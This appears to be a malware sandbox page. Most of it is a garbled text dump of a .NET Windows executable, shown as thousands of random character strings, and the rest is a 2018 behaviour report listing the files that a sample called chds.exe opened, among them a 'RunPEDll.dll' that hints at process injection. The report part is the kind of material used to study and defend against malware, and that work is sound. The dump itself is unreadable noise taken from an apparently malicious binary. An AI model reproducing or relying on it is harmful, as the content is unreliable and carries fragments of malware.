ZRjf
: xS
?8wh(
;|RD
a1~-x
.'Q`
DU #
4Vbmd
)wk"d\?
=$qr
8} C~
*635
]]\p
g, `
sEN=
Mzm5dLWQuaduP2FVS6upc7y7as1p4
K ?L
q?r[
];#,1dY
e@iZG
g1|W
#0Zs
J[tpY
P=YM&
p!51
Q %&
BWW!
bh`P
wy D
=4 F
K#ne-<
DaG=
xkj |X
D^x2
0^mk
2KzS
bY0y<
:Wuz
h_L
lC9`jr
/A.}
6<#G
%/Xe
d9*Q
/cmH ,L/
X ;
=`eV
*GLB
QD6
I+-yooxu
y}w=
G7<s
=$ C*
5,:Q
(s)a
T\y%s8
m<B!9l
Bjd!
BSJB
2!-xi
43ua
!4V
*e}-
]'{89
$9Hb
$+$4Nb
X]kp
J([Mo
e-OE
IMSx?
D_I
P[ <
f4sE
oTB}
^i&Z
,&-V
&e!@
LGh
~um45
x.vmE9
8?+7eN
CEev
5:hc
f(zk
-9V{#h
yC n
7gX%
| s0
+-3E
p{1Ju
4I's
nZ,KX
t_.J.~
7*=>d.
'Y? -W
c yk
SRMX+
|T[fs*
_ >mprk
Dwaj7=
*A!B
'92%
^LM}
1IzV
_h %
pd Y
pcj4Y
BYdr
=#q=
x(D-
{b'=
Rd-DR
get_Message
!This program cannot be run in DOS mode. $
2y;
>YN_
GeI1X
9}Uu
t|U
lJs7
y9@+IC!
alph
O4 ;
Do2h
/I)~
xrguf
*T!q
{ $$
ul#<k'.$?S
1qK
aEH G
d u~.
,X6o
foo"
\yGK
oxX 7+
G<Eh
A}#X
& >D
ly=u
>&b:
Fg~:
]a{Y@|C
E-72
P]m/!
>RPHw
#S$}
I{5Js
[;W
{c:M
_PTE"/
J$pq
$LpXg
M8gY
ce=78
f} [
2=/z
fgoN
_G^-)
^~K E`RZ
#~jeB
eda.-
G#Q_
1`yq3
R,:_
P.d[PU
N6{B
{tSn?
5[7Q;DiKCPb
}k;v"
,3[Cw
M4fC
sTp)Z5&
bA>])
<vY%p
#6wd
$^9,
`uc=V4>
.t!0
_0*l"
@z
a\y z
rlaC
Y[wz
oC;'`
<3T)
#GUID
]FO@
5p '
DyOG
}@f
`cr
CG(4
tmz
&Xve
3L a
3M *
r zN
'}d0
2eN@
D2e q
5g-!X4
@jHrp
d= w
6^R{
J;-"uzZ
2q$8
i],]JK
):on#
43EVz
GATj
/R;u'"[J
"??A
ID{j
4*qS
nn4 _
b;;$
KZe]
\} s
:Hb
pwn}
q7o #C
Tg1K
XOah
b%#r
{TC6
YeH{
cTE)
;Uw)
=4?/"
X{ ?.
|f m
q6JUb
9MvB
+Q|vx
Udz;+E
A%mL
?])N
a^Vt
4#`uv
@Adg
al;Q
69sf$oW
-hO\
vc/q
E+ G
GcQ6b
)YV?
xb P
kIs8
$Tx6kqYxBPAhsCoRPc0KyrBV6TPxftN3Q6PrZ
_Mnl
-t'{2
. R
jNv0w#
<>S"
;3m c
G8Blz[sakyO#u`6B
E~ Y
'oIVjH99R39iED24aAy6rMY1mtCctTLOE2nOlOmb
q%ih@
^<~)
k2x,
*;3"
5wmn
Fg i,
:#=h
~*</?
-K* ].@
$vEG
_%4=|.\
X*0
u~'(
Li Md
p>z9
<?; ~
$'mR
G&2\g
N't?
1x%_
Th%2
"uxy
35Xv"
KBf+
>)r&
HHEii7R>
rQEdu
BEj/iz
c,'E-F
fmUM
HfdL
aXZr
>m30
uo9(
p=Hq
=fH,
+hgqo
wLW^
g'ocX
, U[
$~r:p@
)YDE
p,|j*
K>PH
EbN2
p"/_
a8?
uB,
vcWC
{jrQ
t@Kd
2e\c+
;,*L
A){%2&
1Xd&{
"u1Z
W.%)
Li9}x
-4,R
K c5G
dcQ|
qaeP
9_fG.
O9Z%
,H7+
>QID
zTc:
[3J`s
+bu
;l5@
#(NG
_2Ma
$L ipNa
hO^r$
N_N]
pt@+
qkz
\F:2xX
f7MJ
Bg2D
(DK
b_!YhE
=%H
arkq
U)`\
L1 &
:e4>
Gu@e
=^B]
6@9Q
_12P 5iL
q1&W#9
g[>Wq
KWz{GCC
N#O(
;JWX*
FPo8Y
:}-W'
:~BB7lu
uW`x#
U^ ;A
BD K7
Y~xWW
T|]
K`+r>
Xs&$]
/|L-` ElVY\
kFoQ{
=3$T
* 3%>
c"<I-
L cS
c8xH
b3 3x
[:-(
g@$@bBi
oa $n
tm2?d
uJh7
Y;>W8
&) ^[
V?Z9
uc57b
wl0n6
UDNF
prpF
d4!)
HBaB
RgSi
)1dd
=k|$
l;Xm
#W70
%by0
1x>,dZ
,: S
]6LZj4v
m^)!K
Qno0
_kO<
W`C~
2&WP*
#Kw53fMo
}.?<
91gN
! N
J` K
! 4n
7W6>3
u< P
S"tE
nb.6
jFMe(W
:O <
ofeCe5
|r&
;@BL
IXxYp
BwIu
(}02
./<8
VeqO
hn6P
C;I"
YLTKW
Ocqw
];Ja
J z
pn{S
!CKR
ur%k
GE0T
Y]LpN}
,]4g
>.gVA
FZh=
+yT
3p:+
bvGKa
Rk#w
K @
SCO4
sk`R
=8Q-CU
99 B?
@if
k)Q$d
3O86
wf$A
3+xNJ
@=wC
( u
FGEoP5HDd0UqAYZjc2yiEu1dRA5dLfL
1]>tJ
0U|X
O;_?kr
}0#~
>@2g
J_ Uz
3UbTEY
?rwV
YoJZ
51q)-
H0jS
A"Qp
M+W
qj^6n
Hy=9KF
'/<{
NwJ
+OOHK
d peb
B:.:
K;F(
R{K5
p %d
^wS2
%|E0
+ze'U
)')q
aJA.
,5vn
S% _QG
J3g2Ps
%`lO
Kiu <
Hq=WA
4)g Gi
)Pua?
H}^X
yfxIh
;`&h
?+ n4r
ljEr
k *~
n` U?
D6!I
Y Qzh
] J+
m8`w
JnLl`{
tiZ]
y!=D
=0O
HpFU
c[t/3
rGMQ
`lO5
ZLta
(PjG
'^nq
8'Ba
{76k
$,.J
zCga
\0ED
7Oal
L\jn
~$moQ
s}+
~TG:!
/]J{)
Te,"
7eiu5
'VZA
l saP
WHOx=JQ
~+R.DK
]iTk
SpjJA0
c58\
9jzhg
$uL<
?j:"w
r# Hs
2 &U
@- U
!3[2
<{Kmb
{j;BqH '
?/&J
/Ypcte
fa)@
w-ama
V<Y+
N#TH
t<wOS
ret
UQ~
^B}W
gPg
:fxQ(f
zch;
R|87Y
#K&()
g~`I
c,JP
8FG>
P561
&w%DYs
e[gV
<Xq>
U>;Ln
ZQ*I
;#cqE
%<ZJ
gO'3
Mt!>
-TT0
n< p
-/(I
[t#, KHq
#zxek
1]F@
BF<2
AV*2!
~f K
Kd>R
8AbN
cwnz?
O!eo
aKOj
b )F-
jyp<mG
K*3|
Bo?F
S#jY
}c\w
d7l$
0c2]
}nfZ
>8od
?)vD
d\>T
Ly @
PwVm
3"j(
Q0|b7O$M.
G JZ
,jTi-q
J %a
U(]4
{l$$
Xb [
yw-S mQ
g+oy'mb'm
MFM1J
@3zOH
#yLq
qY\A
k.m"
nD^
U1vt
qHu$
l@L
Y0NA
xisA
`*PDX
\[xa
/\['
{8uZ
+khw
v75*}
6c?W
G 5V
vFK^7X
jy9j
VmT k
hagn
y"SuC
,3ru%
WF,C
*:Z4
2\'ny
orF@
""l{lHC
bI}+
re*7
|`np
0Lv!
1]kGhn
B{Ki
LbbQ4^ES
a"hN
gsGo|
Bp&FQ
CompilationRelaxationsAttribute
6_N#
<U}S
2l*X
_j+z
"Q6~>
178.
]Mqn
N`#_
*ycy L
'~9R
(}h>Vny
2W"k
G $c
sDDX
;H6u
I$[wm
G7&l
#)-i
7{%>
<BM
4 ${
esN{
~pY"
7<3UF
](M4Us
<q#
E`lIC
I:So
}SC7
@)oB?
DT?f@\
= uV
eE;H
EGx!
y, t~
N/*R
*&Ci
Gcf%s
u`cDQ
9M6;p
waxDT
-8P]X
{V7 b-W9S
^aI8T
yBdpK5
n~!F"
%uEz
*,2c.
IBVu
uF?Cp
Show
=3+
^Y .
D>y9
B*((
x {oD
z~k#
fHxk*
~6y,
n0R
RZYP
z,J%
ART=;
Yz~K
r7AZs
It!"Xp?
xpTu5
qIre
NVfd
xqooRO
*?[Ft
16+<H
&p 0(
F??h
d'8n
Y+1U
8@rA
String
9hzBkiMoGFqbkwxHk4YOkzb8o6
W%x}
_CorExeMain
:R9Q
@w'=4g
l# J
T/ a
a9h`A
XnNE
RqjO
rE*c
* ?{
3}&f
( &
ll -
_{+8_
+ `
-qhE
`wdTH
Dbj4s
PikClDZLHhKW85mLQoMm44oT
j&;R
%sj,
W0;<
X gT6
tnl=
g3PZ
m?VE
Wv>8~
X>hTD
zs#x
%7iF
nyoD
)Z^M3j
dxJC
bXt V
GzBx
*a \
X]eg
r+C <
Hq*
h[B4
2aV7# W
m=,q
p\6G
N](tJ
kf..
3E^3,~F
NpNz
}Jj,
skC
pMbMw
;t5m
,VlP?11
?c =
K~HA<
_ L=
L(]MsK
22mH
&_FW
.`zY
c WJzV
e[`d
6SvZ/C
8_*p
%4hWpQlr62wO2ekR07x75GYOiICpPmmZSy2Wm8
C,(O
;<zV
U]>$a
9.']
%yqt
Dv-h
:T&MrF
f%%$!
cjqC(
!+7d
Q)L_
=q6~s9
tY$}
Dd}iD
M]J|q2
TdGR
JOD\
k =:
GetTypeFromHandle
2|yP
F6pT
!EyNA
59 0P
/;/s
xh`(QL
=w<S
fIq
C*<B
B\>lh
Ll]m
4J[Bn'U 8
2tyN%
/vB}~{D
[l$X
'o6cL
FhYJ
L9yG
6U)M
e jQ|t
_u)X
2-94
omkQ
VOtK
~@+"
{;b
N3 9
e [~ =
5k`e
A'`y
[2n
w^%0
t\, h
$FG 3
]BxB
!yHX
N7*"
L~T^
ds{Kr
WG=o
|RfH
vwTg
rI^$ {
i'=6
~bW<
?vx)
Z9QG~
!bcc
"T0$mP|
_?FV
Z1y&
+ ]~+
/YZ#@
]$X3
6`j9
dY>O+!GK
abRI
9BiM
1qs>
c`QQ
Lmd5
G;{Y
>T H
97>*
Lh>~C
ele2SpPbTTSaPziyVVJIq
?'<]
"E{,
n.`=5
E^L
U=3=
)7yq^>|[)
utF4
Q aq
^ 'l
M`o/h
^2ps
~4q:/fs
Y8jQJ _
Ihrr
RB Lok
Aja
R{a=
U CU
1WemO0exyVfmLpDHjYGoQ7qz
>e:O#
L35^
/T1_ie
5s1U
e0EC
=%Rx
+sk0
EJ[l
]P`u
x{7Sx
xcCAt
4k/
@?']S
wK>D
e6ag
x1k;bG}
. ;
M.! H
6p T
/diW
@Nc7
SCl+
NH*K
rBm)f
<~C=
J=Ds
[xG Ra
o<|{
q }'L
G; 0
^~Q
n }G
wR)2yJ
R7Z) =
iwQ,W
S#,+
pSEa<
J.Ds
<`Ds
fO_s
p)&[
zphA
Zgi<
]?z{
\ -Qg
P A,$,
A]yP'At
A Im
xA5O
M41g
lJ-5
*jx-
1f~6
/"Xa
8)oi
u :g
*bSC
5sGc
`tB[
e7 r
t*\w
DxK
ww!6
+W:_?
Z/ke\<
&M6X
MVbDU
<|{)?@"
/{exB
HPmp
oRU+e6
UeA,@
ZASy
g-Dh
jIjA
9IIE
xT(A
v#x'
rO`IN
1oh im
~eL!
LxBn
]Q'C
* Ib
:m&S
u,k}
)f4BZ
9@c}
{C]D
m j{A1
Bd]Q
(?GU
TZ%i
NSe[x
@yF3s
a.3!ZsV
~T.F
a H$
=dtR
6/
aIF.8L
BtU8
xIQ8\1
dU+=
f<7lq
:h e
Ul+xP
[;XL?
/~wccv7.
|_XzoS
"TL{P
Ece
_S@5)
=zhao
#"19
Va6:wR
5?c^
: 8.
j9ZM
}f u
:xbZ21t
<:VD
kW1$S
l-jn'E
4H+%
Gu{0
4$5t
:JTC
zIo};
=37g
eN*+P[9
/SA
hZ6ZZ0lkU44RBqhCFY03HdmHiOi4QUij
b V F
arpd
,Y 6
,":
- t?E
YM3Y
@.P5
jg[Ff
'ryB
*j&I
? |
Wq>
bA7E
%U0%p
zr7d
%f |?
2b6ACp
V oB' .o
m)v`
93l4ae
] >
%Z9c
4E/bB
AL`9
96{`,
'mEs
-*Afs)
Y/snt
/9.w'==<2oJ
+mx[
Q z}
E*{/
ksmZ
Ul.1
?e:`
Nek#
sFG\
P&0(
| !h
Tc\HN>
KG}n
i[ e
ZMDi
bHgN
_O0G
(}yt
jaf
D_VRN
){S%
/gi^
n PT
pOBR (A&y
7]X{'
+#}{er
}m|4
<.$h;
DWlX
IwUbi
!Q4L
sy#P
i[ J
"cz\k|fw
/1HE
0B O$
9t}P-
(xor
FP:AnVt
~Zv;
2Y#Q
.` e
\)kU
G7 G
.c0-)
:^J@
Nf+d
[=46Z
Awdo
mM *
iZ1*
~RhrY
L~GQ
s
AW'q
Zl;b
m v18
"*-
>z7
z. M
~f=Q
b9md
{Y5R
] & e
:~yi
qHgR
Tt*9s
US u_|
J%{:!
|FV{
?YH-
$ZeZ
V2]sj8 .
iqI
wqw7
[:b$j
|vip
qY9U
^Y+{q 3;d
| },>
T4 -?
[Gwt
Lj?xrP
y^P5=J]
VMm"
9dSV
jQ|qa%tM
KY,#
( !
(e A
ldU5
@2Jq
{-f:
|R~
T44t`
RA >.
ut_d
.s'_
ljIr
j~7!
V~TFu
_11Vk
SBN=
U3{\
H> 8
rRkv
'06 +
|n6A5
7O3 V
*P+6
jU$8
*ro1
NS}Q
nu_y
|oP
s^/4
1]!z
8''y
U<^$
AbEP
pY}F-~g
Te{~
bxq(
75gk0RbGw5XvHm4UnIPdwMnRokr7omD
>O}U,
=qRZ
>U2M
`v.YwS
p-lc
)F1/
mt"J
lT}2o_K
mN%_
,F{wN
QckY
LKSS
>"_sP(
6_~T9h
9;>
Z;J/
B;E\
_GE3
WcEX %l
~*@K
2%f
[~G~
V-P
f/{co
Co=z`
/NHwT?
y "
5K /
@5'4Se
4b,Q
eKB2
YU&\
rb]V?v
b eh
r MTv
qgbK
A-;!
^V-
0iU0nYg
Un`Ozy
8z Z
R}07
'v'~_N
[SK!
deAq<
@!<^K
3L]X_
>+(^
rRUB
GI5)
kF^5
8 V(
<6Js
$h G/
<ZISR
>0.)E
5+&vc^
TDd|
{ZXQ
g\L>
xJ;r
I3D+
aPAh
a-Ib&aWVoq
*5"e
TfR
8.>,
~k-rBE
\`*H
f 'F
\l/g3 g
:e9z
6ixw
<o~=
#(pQ
A1z{
#b'*
sU"<r
t"8|
)+\,@
; b(MY
q3c
@Lj\o
rX.KZ
zAK-o}
w,fp
28MC
r{bx
j)Z8
AlAw$
ddK3cdMoK5qitbyIbSohjm5PrfI
&kBMhxHzc7UmxyiamHvd3F48aQHPfxSDs6qCw4S
w*f
Mh|r|
6n^u
mJqi8ygpXgpFsdRlvNGMH
9nP<E
sk!O*_
mxP!
S '?
U0vi
I8>j
$@Ms
hX9b
S")1s
W_R!
B k(
/9WZD-
6ubD
wVB`#!
*~-Y&
lXcS
(N6VF
caO>s
x5%-
V$+N
3w N
PO=@
*LVA
VIV'
ep<
{FKD
(//7
7,ep
ObO-
fe ~
j:f)
;`Q<
8("u
`n1;#
"laI#KSB
xZ 'V
sK .
^_8t0
?[IV
:zqn96
Ex#?
@fc[
zP e
_l+\+
HjMf
Lu/6W
w)+\
5{1e
bng ,
~H\tA
BR'*O
d `1
If?!
]LK4
\System.String[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089PA
*zy[
"!;O
/j'
-G32G
C 8e
95J2
wYm M
qjSg .
rd#Gha
W^a\o
6t(5
) I\
%x[
2cTH#W
XON
Jp na
o> 9}o
>i29!
?4vi
+|Ye
-|x?D
MER3u
+L<!
ZE8:!
^.&R
`WMe+
w4sFk
X{ja
,e=c
=B"'J
iTs?
-a/;C
-E@U
mM }
LHa*
c )(
3iTA
X{i^$
ZD_J
4%d`@/!:D
s0Ug p
V.]
'6gJ
YCM&
!u;*
Un[/
D%wP
56C
elH q5
%"}c
Hb-+
2^P3
zrUv
v R()
L,xf
F~X&
(9$x
tffd
>:z2(
"zuTDyqkZW0BdqBWJfsJySHpRURZ6Pp0r2d
urZL
Qs6X
Y08`
f]pAFR*
2}'
< 6zc
Q?Lu
"e$I
U>4$&'
?mdV4
xR)k
1iDo
#6}s
0O7b
u >)
-q@x
)@fwH
La[f
8keqF
TdW}
k~7R<BW[/
B-xx
wad-
Np)(vk
MpXx
RTQ
S?%:
FV}y
+Yr[
K"687
arK,
JDEO
CmuH
7F'&
<'4{
%^69
zX[<
$be1
5I;5
]qH1
M $>
JOkn
7;ppM}{
Zf2?
RdQV
,K8S
;p+N
rmSt
(ihSh
((IC
SqMy8
8LQm
nD\h,
Zdgw
es:J<
tO!7
"O
*.K~
36dKR
Qdx|-
zf%9
u/^R
&j|V
I^V]O.
xtc1
dyovCg
o_LX0
Rm}?%c
QQC0
>dft
upHU
];M@
kyxT.%O
z]Z/
D% 6
-o>0
,@zO
qMLl
EPu$z
^jVz
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
vKDYY
LO*
{[k(
IJk|<Z
^3z
xK3^&8
[,
% &Wk
#d&E
rv4cnFY
=Jg0
U.T7
VsaytiNxzJsFBYS5UkUyVcTc
o"zh
O!/0 VM
)1)m
ql >
#qY"
6j0I
DGIa"4r
y0]G5
B-oT
]io'
00W|
>DiSa^
G;8 2
eaq_
Cj[0
o};)Y
^A/[
@wly
#v:V
krK5
$a+(#?
CbEg
y~k/h
(nmz
\r7~
[ACi
.@G2
vlzK
*sv x
X*
6P&Kp
I/J@
=#H9
$ $Y
O*F
4yti!
bKMxHe5jkLgWiKg1K9Gja
_RAz#qy
>J2kRk
tW+y<:7
7`_w;Q>
W=\.E
IW#H
?g0]m
*;0
E->$d
ZfiLi
l +\
G 87
w@O
Ky\BP
Gzh.WJv
Kzz0
.i|
nu^U
dlo -
ZBPc
ucR#J
PNTN
B`CS
Xol
In9f1OTkR8oaTd7cWlFKNSdjqoTu
Lr#m
%cB#=
+T+* l
I=O\<<
8D
+2>
^.U
g9d[C
f~iy
KYnBn
Aqmh
t}%
1 cNZ
Hl }
l];',Fu
}/W1
n `M
p|03
q w#
*r28w"
5DM
`9]7
T@u4
0@~4`
:5@RP
[I 2
0OyS
JYOv
hA=x
5_" 2&
Bac'l
=}W~
_r$7
ze0|
11G&@JiuP
:KkF
q=[
9n)70LF
XN.#
!^h
M!23
"[b"
Q|CND<q
h: >
TO~2
."xZ
G&)U4W
BD)Xj
t2fc
+ '\
%[w#
~a|k
b}~#
<BC'
pqM ;
HqLL
&%@$
FQnhk
sE!)
y q'
]bh[J
sar=
(,!{y
To)c
{C&.
<{^f
-Y y
%%Pl
j of) 6r
Ww?>N
K**_
,E +
'+A6z,
a9 Y
1(Eu5
U2 N
OU{m
{RwL
^&3H
0R^R
c^WW
ZoCG
6j4_)h
A_a<a
#w/QI|P
[9Z
"E}
"# w$
Zc7H~
H+0kA
XA7:
ypu
kv}0
(_v0
N CQ
q]q3
;mrR
|5:N
L Z[
(j;2h
cG3<
n2by&
~p?p
E*Q'
z)+q
jy{a
NU_<
*D^
9*7g#
|Ir(
C'd+
5if/
zFYO&
:02Q
^A=Y}
2'B,9"NT
2i"|5
"6A#
D7]7
8>?J
,M{^
M9Y6
[ EN
mXnw
MTP`
Rsu(
- p_o
%5C}N
gVI"
EJF3
JDVh
j+YIx
]XFH
#j|
.zx
|)-D
lPK6
7(IPF z
17nX
:u)C
Gkh.
Q$09
ZET!Jx
6%A 5
tgr:
u}@0
\dT#
7N L
ZqCS
;) c
~/?j
fsD
9(^Du
b/xu$"
UCX5
\^6
Xq#!g
]6='
E]dm
8+ 6
clhq
A+Q;e
+<K4
mscorlib
!bhm
TDSI!
pAf6
L.be
1fq
"X(d
a:~
BSEr
OJ_#
d~n
IOBe
9Km=
Ziu[
X*`v
#TKl.
qI6pk
3Pv+
khtXf
Lg9?
}e;K1
8c`v
F-SP9
~Led
W<IX
7e1,
>L-
p)\
.oq\
%lD&
8A"H
] ]
/,s:
P&e
DD3T
BCHC
SqC
uHDR
ctOai
P#ux
R^Niov
_%f2
PGcjw
O.Fk
(_[n
1=U&(l
pb'q
Aas(">
}H ?
>D7
W0>
GLg0
K &@
?+ Z
=:G=&
k"z3.
1=M}(@
sKb{KV
ra0#o
5(8S
b}J8i3
(HX_#
7X*WR;C0CSL
qTjz
_B9I
Ep1h
RR7D1
|bp)
rSRm$
~YR]s3
0Jt8
D4s6Us
E{CO
Y80eH
-?uK
Z:aB
:J.o_6
~u?5R
k|-F|
Yv^\
;?TX
CAjO n
dVnn
2L0@L
kP9;
:*_S
ro8Js
A;U67
~Cyk!
[R:M/K
+>~kV
WJMMgwmn28XfKPmM7m2Isnnsi2CW
tMUv]
_WG5
!VRX
$q4P
q\(4
@* `
+YP2m
T]VO>@
CANV3
LrOh
1{7Jdy
_i7C
UK!<
v6iA+
pKy)
q&!i
tVR{
!lmY
?=c9G=
R qw$
0#>^g
K%(N
# ?g
UoeR
?:;"
` EW
_-Hy
oC e
R|BK`
-g\o
S7oX}
dp]18q7l
m5@?G
|&;LD
j-Zl
;Gzma
AH4?
Tc@x7^
%=mou
Pc;u
8 t
a@W }
+PyU
j2Fr
e?J{
f;B~Y>JoT
{1Q$SL>
L<!k
k(Q11
Zu(U
V}V+
&*%#
=w:K
Ff40f
q k^Mp
a14
_ 4}
VRXzd
Q4 MF3
"D{#v
t i_u
4Vo$
r+)$R@
+lG
I-?
}4,
ij5H0
+DsL
i(o0
k /B
IWf5
B+8z
BB:}]
n#9K
+H'g
hx j
`xN bP
}`Hs
u:7]
o dD
k)yS
6GW:
1u\zM
bf|kt&
rPU
!}Ob"
.p {^
B G
1f$D
4&Z=z
j[!q8#
O?
` A
sfTR
^';N
pvdas'
$pr4
Qel}
@I%\R
^q'/cRy>*
w^sy
_ qj
`E'a
`u%U*
@<e
w);Y
S~.7
uti{m]2
*afs
9 @%
,zHZ)
R6}?
0J^?
HDz@
DT3z
-)['
!sg U
ql[c
b=TE
9 zs
DzrJP$
er]Q2
QPtO
E@_
)#q0
u8'R
) ^
b(Gf
8Wx}c?
(9v|
"B`H
qb8}g
bsL*
B`@|
nJEv
XGV
**zJ|
_)RGrG
EHk'*
B!RH
N*kd^n
]|2`
# Yn(
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration (seconds)
Seven01_64 Seven01_64 VirtualBox 2018-03-22 17:41:03 2018-03-22 17:43:53 170

10 Behaviors detected by system signatures

Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration (seconds)
Seven01_64 Seven01_64 VirtualBox 2018-03-22 17:41:03 2018-03-22 17:43:53 170

10 Summary items with data

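Files
(Every path the sample opened or queried. This appears to include search-order probes for DLLs and satellite resources, e.g. the same DLL name tried in Temp, System32 and each PATH directory, so a path listed here was not necessarily present or created. Compare with the Read Files and Write Files lists below.)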

C:\Windows\System32\MSCOREE.DLL.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Users\Seven01\AppData\Local\Temp\chds.exe.config
C:\Users\Seven01\AppData\Local\Temp\chds.exe
C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\unrar\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Python27\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Local\Temp\chds.exe.Local\
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows
C:\Windows\winsxs
C:\Windows\Microsoft.NET\Framework\v4.0.30319
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\fusion.localgac
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index149.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI
C:\Users
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\Users\Seven01\AppData\Local\Temp
C:\Windows\System32\l_intl.nls
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ole32.dll
\Device\KsecDD
C:\Users\Seven01\AppData\Local\Temp\chds.INI
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol21.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI
C:\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.INI
C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.INI
C:\Windows\Globalization\it-it.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\Globalization\en-us.nlp
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\Globalization\it.nlp
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.INI
C:\Users\Seven01\AppData\Local\Temp\it-IT\chds.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\chds.resources\chds.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\chds.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\chds.resources\chds.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\chds.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\chds.resources\chds.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\chds.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\chds.resources\chds.resources.exe
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\bcrypt.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll.dll
